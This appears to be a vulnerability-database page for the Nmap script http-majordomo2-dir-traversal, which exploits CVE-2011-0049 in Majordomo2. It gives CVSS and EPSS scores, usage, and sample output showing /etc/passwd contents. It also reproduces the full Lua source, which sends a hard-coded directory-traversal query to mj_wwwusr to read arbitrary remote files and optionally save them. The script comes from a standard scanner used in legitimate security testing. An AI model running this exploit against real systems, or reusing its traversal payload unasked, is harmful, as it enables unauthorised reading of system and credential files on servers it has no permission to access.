http-majordomo2-dir-traversal NSE Script
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.973 High
EPSS
Percentile
99.8%
Exploits a directory traversal vulnerability existing in Majordomo2 to retrieve remote files. (CVE-2011-0049).
Vulnerability originally discovered by Michael Brooks.
For more information about this vulnerability:
- <http://www.mj2.org/>
- <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0049>
- <http://www.exploit-db.com/exploits/16103/>
Script Arguments
http-majordomo2-dir-traversal.rfile
Remote file to download. Default: /etc/passwd
http-majordomo2-dir-traversal.uri
URI Path to mj_wwwusr. Default: /cgi-bin/mj_wwwusr
http-majordomo2-dir-traversal.outfile
If set it saves the remote file to this location.
Other arguments you might want to use with this script:
- http.useragent - Sets user agent
slaxml.debug
See the documentation for the slaxml library.
http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent
See the documentation for the http library.
smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername
See the documentation for the smbauth library.
Example Usage
nmap -p80 --script http-majordomo2-dir-traversal <host/ip>
Script Output
PORT STATE SERVICE
80/tcp open http syn-ack
| http-majordomo2-dir-traversal: /etc/passwd was found:
|
| root:x:0:0:root:/root:/bin/bash
| bin:x:1:1:bin:/bin:/sbin/nologin
|
Requires
local http = require "http"
local io = require "io"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local table = require "table"
description = [[
Exploits a directory traversal vulnerability existing in Majordomo2 to retrieve remote files. (CVE-2011-0049).
Vulnerability originally discovered by Michael Brooks.
For more information about this vulnerability:
* http://www.mj2.org/
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0049
* http://www.exploit-db.com/exploits/16103/
]]
---
-- @usage
-- nmap -p80 --script http-majordomo2-dir-traversal <host/ip>
--
-- @output
-- PORT STATE SERVICE
-- 80/tcp open http syn-ack
-- | http-majordomo2-dir-traversal: /etc/passwd was found:
-- |
-- | root:x:0:0:root:/root:/bin/bash
-- | bin:x:1:1:bin:/bin:/sbin/nologin
-- |
--
-- @args http-majordomo2-dir-traversal.rfile Remote file to download. Default: /etc/passwd
-- @args http-majordomo2-dir-traversal.uri URI Path to mj_wwwusr. Default: /cgi-bin/mj_wwwusr
-- @args http-majordomo2-dir-traversal.outfile If set it saves the remote file to this location.
--
-- Other arguments you might want to use with this script:
-- * http.useragent - Sets user agent
--
author = "Paulino Calderon <[email protected]>"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"intrusive", "vuln", "exploit"}
portrule = shortport.http
local MAJORDOMO2_EXPLOIT_QRY = "?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../.."
local MAJORDOMO2_EXPLOIT_URI = "/cgi-bin/mj_wwwusr"
local DEFAULT_REMOTE_FILE = "/etc/passwd"
---
--Writes string to file
--Taken from: hostmap.nse
local function write_file(filename, contents)
local f, err = io.open(filename, "w")
if not f then
return f, err
end
f:write(contents)
f:close()
return true
end
---
-- MAIN
---
action = function(host, port)
local response, rfile, rpath, uri, evil_uri, rfile_content, filewrite
local output_lines = {}
filewrite = stdnse.get_script_args("http-majordomo2-dir-traversal.outfile")
uri = stdnse.get_script_args("http-majordomo2-dir-traversal.uri") or MAJORDOMO2_EXPLOIT_URI
rfile = stdnse.get_script_args("http-majordomo2-dir-traversal.rfile") or DEFAULT_REMOTE_FILE
evil_uri = uri..MAJORDOMO2_EXPLOIT_QRY..rfile
stdnse.debug1("HTTP GET %s%s", stdnse.get_hostname(host), evil_uri)
response = http.get(host, port, evil_uri)
if response.body and response.status==200 then
if response.body:match("unknowntopic") then
stdnse.debug1("[Error] The server is not vulnerable, '%s' was not found or the web server has insufficient permissions to read it", rfile)
return
end
local _
_, _, rfile_content = string.find(response.body, '<pre>(.*)<!%-%- Majordomo help_foot format file %-%->')
output_lines[#output_lines+1] = rfile.." was found:\n"..rfile_content
if filewrite then
local status, err = write_file(filewrite, rfile_content)
if status then
output_lines[#output_lines+1] = string.format("%s saved to %s\n", rfile, filewrite)
else
output_lines[#output_lines+1] = string.format("Error saving %s to %s: %s\n", rfile, filewrite, err)
end
end
return table.concat(output_lines, "\n")
end
end
Related
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.973 High
EPSS
Percentile
99.8%